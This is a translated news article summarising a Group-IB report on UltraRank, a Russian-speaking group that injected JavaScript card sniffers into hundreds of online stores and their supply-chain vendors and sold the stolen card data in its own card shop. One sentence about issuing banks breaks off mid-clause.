Hackers attack online stores around the world

[Tomcat]

UltraRank has been active for 5 years: during this time, it attacked about 700 online stores in Europe, Asia, North and Latin America using JavaScript sniffers. The hackers sold the stolen data in their own card shop, earning up to 500 thousand rubles ($ 7,000) per day. The Group-IB study describes not only one of the most successful players in the theft and sale of bank card data, but also traces the transformation of JS sniffers from a minor to a complex threat, behind which is a clearly segmented cybercriminal business. Having finally displaced banking Trojans, groups using JS sniffers have become the main suppliers of text databases of bank cards for sales on specialized hacker forums - kartshop since the end of 2019.

Each family of JS sniffers is a collection of samples with insignificant differences in the code, which are injected by attackers into the site to intercept user input - bank card numbers, names, addresses, logins, passwords, etc. JS sniffer operators choose sites based on certain management systems (CMS, Content Management System), as a rule, rarely updated and do not contain 3DSecure protection systems. The stolen data is sent to the attackers' server - the gate. Then they are sold on the darknet on carder forums, the bulk of which are Russian-speaking cybercriminals. If there are no behavioral analysis systems on the side of the issuing bank that issued the card stolen by the JS sniffer to distinguish the actions of a real user from an attacker,

UltraRank includes Russian-speaking hackers. The group operates three families of JS sniffers called FakeLogistics, WebRank and SnifLite, which are used to infect various online stores that use credit card payments. Over the period of its activity, UltraRank has built an autonomous business model with its own technical and organizational structure, as well as its own system for the sale and monetization of stolen payment information. So, the group has its own cardshop ValidCC, according to internal statistics of which, in 2019, its owners earned $ 5,000 each - $ 7,000 a day on the sale of bank card data, which the group stole themselves, and another $ 25,000 - 30,000 they paid to other suppliers of stolen payment information, who displayed goods in their cardshop.

Since 2015, UltraRank has infected 691 websites, predominantly in Europe, Asia and America, according to Group-IB. But the attackers also chose larger targets for themselves, for which much more complex attacks were planned through the supply chain. Thus, their victims were 13 service providers for online commerce, which include various advertising and browser notification services, web design agencies, marketing agencies, website developers, etc. By introducing malicious code into their scripts, the attackers intercepted customer bank card data on the websites of all stores that use the products or technologies of these suppliers. Their infection could bring cybercriminals a total of more than 100 thousand infected sites.